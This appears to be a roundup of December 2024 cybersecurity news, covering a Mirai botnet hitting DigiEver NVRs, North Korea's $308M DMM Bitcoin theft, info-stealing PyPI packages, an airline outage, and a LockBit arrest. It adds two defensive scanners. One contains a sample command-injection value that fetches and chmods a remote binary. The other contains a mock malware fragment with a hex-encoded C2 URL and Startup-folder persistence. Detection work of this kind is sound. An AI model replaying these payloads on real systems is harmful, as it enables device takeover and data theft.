New botnet exploits vulnerabilities in NVRs, TP-Link routers


A new Mirai-based botnet is actively exploiting a remote code execution vulnerability in DigiEver DS-2105 Pro NVRs; the flaw has not been assigned a CVE identifier and appears to be unpatched.

The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.

One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.

Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least September.

Apart from the DigiEver flaw, the new Mirai malware variant also targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.

Attacks on DigiEver NVRs

The vulnerability exploited to compromise DigiEver NVRs is a remote code execution (RCE) flaw: the attackers target the ‘/cgi-bin/cgi_main.cgi’ URI, which does not properly validate user input.

This allows remote unauthenticated attackers to inject commands like ‘curl’ and ‘chmod’ via certain parameters, such as the ntp field in HTTP POST requests.

Akamai says that the attacks it has seen by this Mirai-based botnet appear similar to what is described in Ta-Lun Yen’s presentation.

Through command injection, the attackers fetch the malware binary from an external server and enlist the device into its botnet. Persistence is achieved by adding cron jobs.
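The attack chain above (a POST to ‘/cgi-bin/cgi_main.cgi’ whose ntp parameter carries shell metacharacters and commands such as curl and chmod) is something a defender can look for in proxy or WAF logs that record request bodies. The following detection routine is an added example written for this page, not code from Akamai’s report; the JSON-lines log format, the field names (src, method, uri, body) and the sample records are all constructed for the example.

```python
"""Flag command-injection attempts against the DigiEver CGI endpoint in
request logs. Added example; the log format and records are constructed."""
import json
import re
from urllib.parse import parse_qs

# The URI and the ntp parameter are the ones named in the report.
TARGET_URI = "/cgi-bin/cgi_main.cgi"
SUSPECT_PARAMS = ("ntp",)

# Shell metacharacters plus the commands the report says are injected.
META = re.compile(r"[;|&`$]|\b(curl|wget|chmod|sh)\b")


def check_request(rec):
    """Return the reasons a single log record looks like an injection attempt.

    An empty list means the record is not a POST to the target URI or its
    suspect parameters contain nothing shell-like. parse_qs URL-decodes the
    body, so %3B and '+' are examined as ';' and space respectively.
    """
    reasons = []
    if rec.get("method") != "POST":
        return reasons
    if rec.get("uri", "").split("?", 1)[0] != TARGET_URI:
        return reasons
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    for name in SUSPECT_PARAMS:
        for value in params.get(name, []):
            if META.search(value):
                reasons.append(f"shell metacharacter or command in {name!r}: {value!r}")
    return reasons


def scan_log(lines):
    """Parse JSON-lines records and return (src, reasons) for flagged requests."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a real pipeline would count these
        reasons = check_request(rec)
        if reasons:
            hits.append((rec.get("src", "?"), reasons))
    return hits


# Constructed sample: one benign NTP change, one injection attempt, one GET.
# Addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """
{"src": "203.0.113.5", "method": "POST", "uri": "/cgi-bin/cgi_main.cgi", "body": "ntp=pool.ntp.org"}
{"src": "198.51.100.7", "method": "POST", "uri": "/cgi-bin/cgi_main.cgi", "body": "ntp=1.2.3.4;curl+http://198.51.100.9/x+-o+/tmp/x;chmod+%2Bx+/tmp/x"}
{"src": "192.0.2.10", "method": "GET", "uri": "/cgi-bin/cgi_main.cgi?page=ntp", "body": ""}
"""

if __name__ == "__main__":
    for src, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(src, reasons)
```

The check is deliberately narrow (one URI, one parameter) so it produces few false positives on legitimate configuration changes; widening SUSPECT_PARAMS to every body parameter turns it into a generic command-injection heuristic at the cost of more noise.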

Once the device is compromised, it is then used to conduct distributed denial of service (DDoS) attacks or to spread to other devices by leveraging exploit sets and credential lists.

Akamai says the new Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.

“Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” comments Akamai.

“This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” the researchers say.

The researchers note that the botnet also exploits CVE-2018-17532, a vulnerability in Teltonika RUT9XX routers as well as CVE-2023-1389, which impacts TP-Link devices.

Indicators of compromise (IoC) associated with the campaign are available at the end of Akamai’s report, along with Yara rules for detecting and blocking the threat.


North Korean Hackers Pull Off $308M Bitcoin Heist from Crypto Firm DMM Bitcoin


Dec 24, 2024 | Ravie Lakshmanan | Cybercrime / Malware


Japanese and U.S. authorities have formally attributed the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024 to North Korean cyber actors.

“The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces,” the agencies said. “TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.”

The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan. It’s worth noting that DMM Bitcoin shut down its operations earlier this month in the aftermath of the hack.

TraderTraitor refers to a North Korea-linked persistent threat activity cluster that has a history of targeting companies in the Web3 sector, luring victims into downloading malware-laced cryptocurrency apps and ultimately facilitating theft. It’s known to be active since at least 2020.


In recent years, the hacking crew has orchestrated a series of attacks that leverage job-themed social engineering campaigns or reaching out to prospective targets under the pretext of collaborating on a GitHub project, which then leads to the deployment of malicious npm packages.

The group, however, is perhaps best known for infiltrating and gaining unauthorized access to JumpCloud’s systems to target a small set of downstream customers last year.

The attack chain documented by the FBI is no different in that the threat actors contacted an employee at a Japan-based cryptocurrency wallet software company named Ginco in March 2024, posing as a recruiter and sending them a URL to a malicious Python script hosted on GitHub as part of a supposed pre-employment test.

The victim, who had access to Ginco’s wallet management system, was subsequently compromised after they copied the Python code to their personal GitHub page.

The adversary moved to the next phase of the attack in mid-May 2024, when it exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system.

“In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agencies said. “The stolen funds ultimately moved to TraderTraitor-controlled wallets.”


The disclosure comes shortly after Chainalysis attributed the hack of DMM Bitcoin to North Korean threat actors, stating the attackers targeted vulnerabilities in infrastructure to make unauthorized withdrawals.

“The attacker moved millions of dollars’ worth of crypto from DMM Bitcoin to several intermediary addresses before eventually reaching a Bitcoin CoinJoin Mixing Service,” the blockchain intelligence firm said.

“After successfully mixing the stolen funds using the Bitcoin CoinJoin Mixing Service, the attackers moved a portion of the funds through a number of bridging services, and finally to HuiOne Guarantee, an online marketplace tied to the Cambodian conglomerate, HuiOne Group, which was previously exposed as a significant player in facilitating cybercrimes.”

The development also comes as the AhnLab Security Intelligence Center (ASEC) revealed that the North Korean threat actor codenamed Andariel, a sub-cluster within the Lazarus Group, is deploying the SmallTiger backdoor as part of attacks targeting South Korean asset management and document centralization solutions.


Tech glitch briefly grounds US American Airlines flights • The Register


A technical snafu briefly grounded American Airlines flights across the US on Christmas Eve.

American Airlines tells The Register that the technology issue impacted systems necessary for flight releases. In response, the FAA reports that the airline requested a nationwide stop order, which began around 1150 UTC and lasted about an hour.

In a statement, the US’ largest airline blamed a “vendor technology” issue for the disruption, but didn’t name and shame any specific provider.

“That issue has been resolved and flights have resumed. We sincerely apologize to our customers for the inconvenience this morning. It’s all hands on deck as our team is working diligently to get customers where they need to go as quickly as possible,” an American Airlines spokesperson told The Register in an email.

American Airlines didn’t address El Reg’s questions as to whether resolving the issue could result in additional delays or disruptions over the holiday season.

The airline is encouraging customers to use their mobile app or visit their website for information on how the outage may have affected their flights and connections.

The incident comes amid one of the busiest travel seasons of the year, with the Transportation Security Administration (TSA) expecting to screen nearly 40 million passengers over the peak Christmas and New Year’s travel period.

As technology-related travel disruptions go, an hour-long grounding is far from the worst. Over the past few years, we’ve seen numerous situations in which IT failures have left millions stranded. Two years ago, an IT meltdown at Southwest Airlines left roughly 2 million travelers stranded as crews were forced to schedule flights manually in what was later described as an “extraordinarily difficult” and “tedious, long process.”

More recently, the now infamous CrowdStrike outage brought much of the IT world to a standstill. It is estimated the flawed update to the Falcon threat-detection system crashed and disabled more than 8 million Microsoft Windows machines around the world. Among them were more than 37,000 systems operated by Delta Airlines. The incident resulted in travel delays for more than 1.3 million people, the airline later revealed. ®


State Department’s disinformation office to close after funding nixed in NDAA


The State Department’s center for fighting global disinformation received a lump of coal in its Christmas stocking this week as congressional lawmakers excluded new funding and authorization for the office beyond this year.

The Global Engagement Center, which tracks foreign disinformation, will lose its authority on Dec. 24. Despite a concerted push by State officials to lobby Congress for an extension, a measure to extend the center’s authority into 2031 was stripped out of the final version of defense authorization legislation that passed through the Senate.

“The Global Engagement Center will terminate by operation of law [by the end of the day] on December 23, 2024,” a State Department spokesperson told CyberScoop in an email. “The Department of State has consulted with Congress regarding next steps.”

According to figures provided by State, the GEC has a staff of approximately 120 and an annual budget of $61 million. The spokesperson did not address questions about what will happen to the center’s personnel and technology following the closure.

The shuttering will leave the State Department without a dedicated office for countering disinformation abroad for the first time since 2016. The closure comes at the end of a year when U.S. officials, foreign political leaders and private companies tracking disinformation have alleged that Russia and China have engaged in concerted propaganda campaigns targeting democratic elections in Taiwan, Moldova, Georgia, Romania and other countries.

“This is extremely frustrating,” Mark Montgomery, former executive director of the Cyberspace Solarium and a supporter of extending the center’s authority, told CyberScoop. “On a bipartisan basis, both political parties know that Russia, China and, to a lesser degree, Iran and other non-state actors, conduct information operations against us spreading lies, and the GEC was a good tool for ensuring that the truth, as we see it, came out.”

While the center does not focus on disinformation targeting the United States, its work with related organizations faced criticism from congressional Republicans and Elon Musk, who accused the center in 2023 of being “the worst offender in U.S. government censorship [and] media manipulation.”

Musk is now an adviser to President-elect Donald Trump and was placed in charge of an advisory board for cutting programs and reducing government spending.

Additionally, Republicans on the Hill raised questions about the GEC’s value, suggesting its work might duplicate existing analysis from the private sector and other parts of government.

In interviews with CyberScoop and FedScoop last month, GEC leaders pushed back on those views, calling their work “critical” to combating foreign propaganda campaigns in allied countries and emphasizing that they take active steps to exclude data on U.S. persons from their analysis.

“We are really the first analytical unit in the U.S. government that takes this kind of comprehensive approach of looking at threat actors — Iranians, [China], the Russians — and try to understand … what their influence is broadly on the information space in different geographic regions,” said Carrie Goux, GEC’s acting deputy coordinator.

Lindsay Gorman, a former White House official under the Biden administration, told CyberScoop that there is “a lack of recognition in Congress that the wars democracies are fighting with autocrats overseas are no longer only in the physical domain, but in the cyberspace realm of 1s and 0s.”

“Whether their goal is to marshal support for invading neighbors or undermine U.S. credibility overseas, the U.S. needs a means to fight back. One way is to expose covert campaigns for what they are — important work the GEC is doing,” said Gorman, now at the nonprofit German Marshall Fund. “GEC has been the eyes and ears on the ground when it comes to information threats overseas, tracking where autocratic strategic objectives lie and how tactics are evolving to guide responses.”

Gorman stressed that Russian and Chinese disinformation campaigns “aren’t going away” and are increasingly leveraging social media and emerging technologies like generative AI “to sow discord and undermine democracy around the world.”

GEC officials also said their limited budget has hindered efforts to acquire advanced technology needed to support their work, including tools to detect AI-manipulated media.

State Department documents obtained by FedScoop detail a range of solutions and tools the center hoped to acquire if it was reauthorized, including a system for detecting photoshopped images, a “meme detection” model to help analyze and contextualize imagery, a detector for imagery created through Stable Diffusion, and a tool to detect AI-generated assets in video.

Montgomery said that with Republicans set to take control of the State Department and both houses of Congress next month, they are positioned to shape the GEC’s mission and operations to address any concerns about impinging on domestic U.S. issues.

“The frustration is, why not give it an extension now that you’re basically responsible?” Montgomery asked. 

Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.


Too Much ‘Trust,’ Not Enough ‘Verify’


COMMENTARY

Despite never-ending data breaches and ransomware attacks, too many companies still rely on the outdated “trust but verify” cybersecurity strategy. This approach assumes that any user or device inside a company’s network can be trusted once it has been verified. The approach has clear weaknesses: Many businesses are putting themselves at additional risk by verifying once, then trusting forever.

There was a time when trust but verify made sense, namely when networks were self-contained and well-defined. But at some point, perhaps due to the overwhelming volume of devices on a network, the number of patches needing to be applied, user demands, and resource constraints in the cybersecurity team, things began to slip. Initial verification meant the asset was trusted, but no additional verification ever took place.

The User Example of Trust Without Ongoing Verification

It’s easy to see how this happens with users. A user typically goes through a background check when they join the company, but once onboarded, despite any number of changes in their lives that could affect their trustworthiness, we allow them to access our systems and data without further verification. 

In the majority of cases, the absence of further verification does not cause damage. However, if the user decides to act against the best interest of their employer, the results can be catastrophic. The more sensitive the information the individual has access to, the greater the risk. This is why individuals with security clearances are regularly re-vetted, and security personnel may conduct regular finance checks to identify any issues early and intervene to mitigate possible damage.

In organizations that follow a trust-but-verify approach, two personas stand out: those that have considered the risk of one-time asset verification acceptable; and — the minority — those that try to manage the risk with a re-verification program. A shift in persona from the former to the latter usually only occurs after a breach, a crisis in availability, or another “career limiting disaster.”

The reality is that there are simply not enough hours in the day for security practitioners to do all of the things that must be done. Have security patches been correctly applied to all vulnerable devices? Are all third-party security assessments properly analyzed? Do all Internet of Things (IoT) devices really belong on the network? Are managed security services performing as expected? 

Compromising one of these trusted devices means being granted trust to move laterally across the network, accessing sensitive data and critical systems. Organizations likely will not know the extent of their exposure until something goes wrong. 

The Costly Consequences of Insufficient Verification

When these breaches are eventually discovered, the costs begin to mount. Companies face not only the direct costs of incident response, but potentially also regulatory fines, class-action lawsuits, lost customers, and lasting damage to their brand reputation. Relatively small incidents can cost millions of dollars, while large incidents regularly cost billions.

In addition to these direct costs, insufficient verification also leads to more frequent and expensive compliance audits. Regulators and industry bodies are increasingly demanding that companies demonstrate robust identity and access management controls, for example under the European Union’s upcoming Digital Operational Resilience Act (DORA), as well as continuous monitoring and validation of user and device activity. Certifications and accreditations can no longer be accepted at face value. 

The Path Forward: Adopt a Zero-Trust Approach

Instead of trusting after verification, businesses should instead allow only what the business needs, for as long as it needs it. Never trust, always verify. This is how a zero-trust architecture operates.

Every user, device, and application that attempts to make a connection, regardless of its location, is scrutinized and validated, dramatically limiting the potential damage from a successful compromise. A zero-trust architecture replaces firewalls and VPNs, so there are fewer devices to maintain, and a reduced attack surface means fewer opportunities for attackers to gain a foothold.

Zero trust doesn’t mean zero testing; testing should form an integral part of any IT and cybersecurity strategy. However, it does mean the likelihood of a major failure stemming from trust being extended to users, devices, or applications that do not deserve it, is a thing of the past. 


FBI links North Korean hackers to $308 million crypto heist


The North Korean hacker group ‘TraderTraitor’ stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.

In a short post, the FBI attributed the attack to the state-affiliated threat actor TraderTraitor, also tracked as Jade Sleet, UNC4899, and Slow Pisces.

The crypto heist occurred in May 2024 and forced the platform to restrict account registration, cryptocurrency withdrawals, and trading until the completion of the investigations.

Earlier this week, a report from blockchain intelligence firm Chainalysis attributed the attack to North Korean threat actors but did not share any specific details.

Attack chain

In a short announcement, the FBI says that TraderTraitor’s attack on DMM Bitcoin started in late March 2024, when one of the attackers pretended to be a legitimate recruiter on LinkedIn and approached an employee of Ginco, a Japanese enterprise cryptocurrency wallet software company.

The hacker sent the Ginco employee, who had access to his employer’s wallet management system, a job proposal involving a pre-employment test on GitHub. This tactic has been popular with North Korean threat groups this year [1, 2].

The victim received a piece of malicious Python code to copy to their personal GitHub page in order to carry out the test. The code, however, compromised the computer and allowed TraderTraitor to infiltrate Ginco and then move laterally to DMM.

“After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system,” explains the FBI.

“In late May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agency says.

U.S. authorities have been monitoring the activity of TraderTraitor since 2022 when the threat actor started to target the blockchain space with fake apps.

In 2023, GitHub warned of a social engineering campaign conducted by the particular threat actors on the platform, targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors.

Later, the FBI warned that TraderTraitor was preparing to cash out 1,580 Bitcoin (valued at the time at around $41 million) stolen from various sources that year.


Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts


Dec 24, 2024 | Ravie Lakshmanan | Malware / Data Exfiltration


Cybersecurity researchers have flagged two malicious packages that were uploaded to the Python Package Index (PyPI) repository and came fitted with capabilities to exfiltrate sensitive information from compromised hosts, according to new findings from Fortinet FortiGuard Labs.

The packages, named zebo and cometlogger, attracted 118 and 164 downloads each, prior to them being taken down. According to ClickPy statistics, a majority of these downloads came from the United States, China, Russia, and India.


Zebo is a “typical example of malware, with functions designed for surveillance, data exfiltration, and unauthorized control,” security researcher Jenna Wang said, adding cometlogger “also shows signs of malicious behavior, including dynamic file manipulation, webhook injection, stealing information, and anti-[virtual machine] checks.”

The first of the two packages, zebo, uses obfuscation techniques, such as hex-encoded strings, to conceal the URL of the command-and-control (C2) server it communicates with over HTTP requests.

It also packs in a slew of features to harvest data, including leveraging the pynput library to capture keystrokes and ImageGrab to periodically grab screenshots every hour and save them to a local folder, prior to uploading them to the free image hosting service ImgBB using an API key retrieved from the C2 server.

In addition to exfiltrating sensitive data, the malware sets up persistence on the machine by creating a batch script that launches the Python code and adds it to the Windows Startup folder so that it’s automatically executed upon every reboot.
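The traits described above (a hex-encoded C2 URL, keystroke capture via pynput, screenshots via ImageGrab, and a launcher dropped into the Windows Startup folder) are all visible in a package’s source before it is ever installed, which is where a pre-install review can catch them. The static scanner below is an added example written for this page, not FortiGuard’s tooling and not the code of zebo itself; the sample package source it scans is constructed, and the list of suspicious imports is an assumption based on the libraries the article names.

```python
"""Static pre-install check for PyPI-style source: hex-encoded URLs,
Startup-folder persistence and surveillance imports. Added example."""
import ast
import binascii

# Libraries named in the article as used for keylogging and screenshots.
SUSPICIOUS_IMPORTS = {"pynput", "PIL.ImageGrab"}
# Path fragment of the per-user Windows Startup folder, both slash styles.
STARTUP_MARKERS = ("Start Menu\\Programs\\Startup", "Start Menu/Programs/Startup")


def decode_hex_literal(s):
    """Return the decoded text if s is an even-length run of hex digits that
    decodes to printable ASCII, else None. Short literals are ignored so that
    ordinary hex constants (colours, ids) are not reported."""
    if len(s) < 16 or len(s) % 2:
        return None
    if any(c not in "0123456789abcdefABCDEF" for c in s):
        return None
    try:
        text = binascii.unhexlify(s).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_source(src):
    """Return (kind, detail, lineno) findings for one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_IMPORTS:
                    findings.append(("suspicious import", alias.name, node.lineno))
        elif isinstance(node, ast.ImportFrom):
            mod = node.module or ""
            for alias in node.names:
                full = f"{mod}.{alias.name}"
                if mod in SUSPICIOUS_IMPORTS:
                    findings.append(("suspicious import", mod, node.lineno))
                elif full in SUSPICIOUS_IMPORTS:
                    findings.append(("suspicious import", full, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = decode_hex_literal(node.value)
            if decoded and decoded.lower().startswith(("http://", "https://")):
                findings.append(("hex-encoded URL", decoded, node.lineno))
            if any(m in node.value for m in STARTUP_MARKERS):
                findings.append(("startup-folder persistence", node.value, node.lineno))
    return findings


# Constructed sample resembling the behaviours described in the article.
# The hex literal is "http://c2.example.net" (a documentation domain).
SAMPLE_PACKAGE = r'''
import os
import binascii
from pynput import keyboard
from PIL import ImageGrab

C2 = binascii.unhexlify("687474703a2f2f63322e6578616d706c652e6e6574").decode()
STARTUP = os.path.join(os.environ.get("APPDATA", ""),
                       r"Microsoft\Windows\Start Menu\Programs\Startup", "run.bat")
'''

if __name__ == "__main__":
    for kind, detail, lineno in scan_source(SAMPLE_PACKAGE):
        print(f"line {lineno}: {kind}: {detail}")
```

Walking the AST rather than grepping the text means string literals are examined after Python’s own escape processing, so a URL written with \x escapes is seen in the clear; a hex string decoded at runtime, as zebo does, is the case decode_hex_literal handles.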

Cometlogger, on the other hand, is a lot more feature-packed, siphoning a wide range of information, including cookies, passwords, tokens, and account-related data from apps such as Discord, Steam, Instagram, X, TikTok, Reddit, Twitch, Spotify, and Roblox.


It’s also capable of harvesting system metadata, network and Wi-Fi information, a list of running processes, and clipboard content. Furthermore, it incorporates checks to avoid running in virtualized environments and terminates web browser-related processes to ensure unrestricted file access.

“By asynchronously executing tasks, the script maximizes efficiency, stealing large amounts of data in a short time,” Wang said.

“While some features could be part of a legitimate tool, the lack of transparency and suspicious functionality make it unsafe to execute. Always scrutinize code before running it and avoid interacting with scripts from unverified sources.”


The global firmware threat nobody’s tracking • The Register


Opinion One of the charms of coding is that malice can be indistinguishable from incompetence. Last week’s Who, Me? story about financial transfer test software running amok is a case in point.

The hapless dev left code running overnight that should have moved a single cent in and out of his test account. Instead, it machine-gunned $100 transfers in for hours. It tripped internal security but the temporarily rich kid had told his boss about it and could thus talk his way clear.

What if the bank-raiding routine hadn’t been detected? Our hero would have come in to find a huge cash stash sitting there, a highly tempting proof of concept perhaps. Not coming clean would be malicious, but the code’s the same whether he ‘fessed up or not.

This is exactly the quandary US authorities are pondering as they consider banning products by Chinese consumer networking company TP-Link. These are very popular because the hardware is good and reliable, but mostly because they are remarkably cheap. So cheap, in fact, that the company is suspected of dumping, selling at under cost to take market share. The main reason for suspicion, though, is the routers’ firmware. It’s outstandingly prone to vulnerabilities, ridden with things like buffer overflows, to the point that mere incompetence seems an insufficient explanation.

This sounds like a conspiracy theory because the evidence is ambiguous. Line up the circumstantial evidence and it’s at least plausible. If TP-Link does have a corporate fondness for crap coders, how come the features visible to owners in everyday use work well, while invisible vulnerabilities are so common? Chinese law compels all domestic companies to cooperate with state security in secret. There is already evidence of widespread Chinese infiltration of communication infrastructure with Salt Typhoon. Motive, opportunity, ability, and history: where does the balance of probabilities lie?

It would be possible to prove TP-Link products were uniquely vulnerable by statistical analysis, comparing them to competitive products from other vendors. At that point, it doesn’t really matter what the reason is, they could be taken off the market because of consumer safety worries. That wouldn’t do much good, given the huge installed base, and the uniquely attractive environment infrastructure offers to the bad guys. It’s invisible to end users, hard to monitor, hard to update, and once something’s installed and working, it is highly disruptive to rip it out.

A great/awful example of this is the recently disclosed Iranian-linked attack on US and Israeli energy and IoT devices, part of a family of attacks that have targeted a wide range of devices from a wide range of manufacturers. Whoever created the IOCONTROL malware is highly competent and inventive, but at first glance it seems unlikely that the firmware of the target devices would contain deliberately vulnerable Iranian-sourced code. Iran has no international IT infrastructure makers to manipulate, being locked away behind sanctions. This need not stop it. Nor anyone else.

Industrial espionage is exceptionally hard to spot until the stolen secrets come to light. Likewise, industrial sabotage can be equally hard to trace. When that industry is firmware, and the malicious actor has no intention of using the information in detectable ways, this is even more so. Given how valuable zero days are to attackers, how much easier would they be to exploit if you put them there yourself?

You don’t even need to embed a star player in your target company, just someone competent enough to send copies of the code under development back to the malware creators, and get their changes back into the tree.

Do all those IoT, industrial control, and router companies have the ability to spot highly disguised vulnerabilities slipped in by malicious experts? They’re not very good at spotting incompetent errors, given the many alerts the industry generates.

Catching corrupt coders is always going to be hard, unless their own opsec is bad. It’s also most embarrassing to go public when you do. Even in security services and the military, where employees are routinely screened and counter-espionage is a specialty, the job is still very difficult. It’s not as if ideology or animus are needed to tempt someone into sin: cash and flattery do the job just as well.

It’s not a case of whether this is happening. The opportunities are too great, the risk too small, and the outlays too modest to resist. The question is how to find it, given that nobody seems to be looking. A company responsible for a vulnerability has the responsibility to fix it, but not to track down how it came to be and who was involved. There is no agency tracking and correlating this information, not unless national security is directly involved.

This just in: it is. We just don’t really believe it. Until we do, there’s an entire industry-wide meta-vulnerability going completely unchecked. Better believe it. ®


Chinese cyber center points finger at U.S. over alleged cyberattacks to steal trade secrets


China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets.

In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation.

The U.S. government has long accused China of cyber espionage to steal trade secrets from domestic companies, and China’s allegations about U.S. cyberattacks arrives in the midst of a very public campaign from U.S. government officials blaming China for a major attack on telecommunications carriers.

CNCERT said one of the attacks dates back to August of this year, against “a certain advanced material design and research unit.” The suspected attackers exploited a vulnerability in a document management system to infiltrate the software upgrade management server the company used, then install Trojans in more than 270 hosts of the company, CNCERT said.

The other attack dates to May of last year, against a “large-scale high-tech enterprise” in China’s “smart energy and digital information industry,” according to CNCERT. The center’s analysis determined that the attackers exploited Microsoft Exchange vulnerabilities to get into the company’s mail server, then implanted backdoors and took control of devices at the company and its subsidiaries.

China has, in recent years, stepped up its charges about U.S. cyberattacks. The report did not name a specific U.S. government office or entity responsible for the attacks.

The Chinese Communist Party-owned newspaper China Daily published an infographic this year detailing allegations that the United States is the leading source of cyberattacks against China over the past five years, citing CNCERT in part.

Republican lawmakers, as well as a top official in the incoming second Trump administration, have said recently in response to the Salt Typhoon telecommunications breaches that the United States has been too timid about going on offense against China.

CNCERT describes itself as a non-governmental non-profit cybersecurity technical center. China Daily said it is led by the Ministry of Industry and Information Technology.

Spokespeople for the National Security Agency and U.S. Cyber Command did not immediately respond to requests for comment Thursday.

Written by Tim Starks

Tim Starks is senior reporter at CyberScoop. His previous stops include working at The Washington Post, POLITICO and Congressional Quarterly. An Evansville, Ind. native, he’s covered cybersecurity since 2003. Email Tim here: tim.starks@cyberscoop.com.


LockBit Ransomware Developer Arrested in Israel


NEWS BRIEF

A newly unsealed criminal complaint by US law enforcement shows they have been working to dismantle the LockBit ransomware-as-a-service group for several years, including a previously undisclosed arrest of one of the operation’s lead developers in Israel last August.

Rostislav Panev, a 51-year-old with dual Russian-Israeli citizenship, is facing extradition to the US to face charges along with two others accused of similarly working for LockBit, not just to develop the ransomware itself but also tools used by affiliates. For his part, Panev is accused of working on LockBit ransomware from its beginnings in 2019, eventually creating one of the most prolific ransomware operations in the world, according to the Justice Department’s statement about the arrest.

Panev, according to the Justice Department, at the time of his arrest had admin credentials for LockBit’s Dark Web online repository with the ransomware’s source code, as well as the source code for an affiliate tool called “StealBit” used to exfiltrate stolen data. His laptop also had the access credentials for the LockBit control panel used by affiliates. The Justice Department’s statement adds that Panev confessed to his role in the LockBit ransomware operation.

“The Justice Department’s work going after the world’s most dangerous ransomware schemes includes not only dismantling networks, but also finding and bringing to justice the individuals responsible for building and running them,” Attorney General Merrick Garland said in a statement about the arrests. “Three of the individuals who we allege are responsible for LockBit’s cyberattacks against thousands of victims are now in custody, and we will continue to work alongside our partners to hold accountable all those who lead and enable ransomware attacks.”
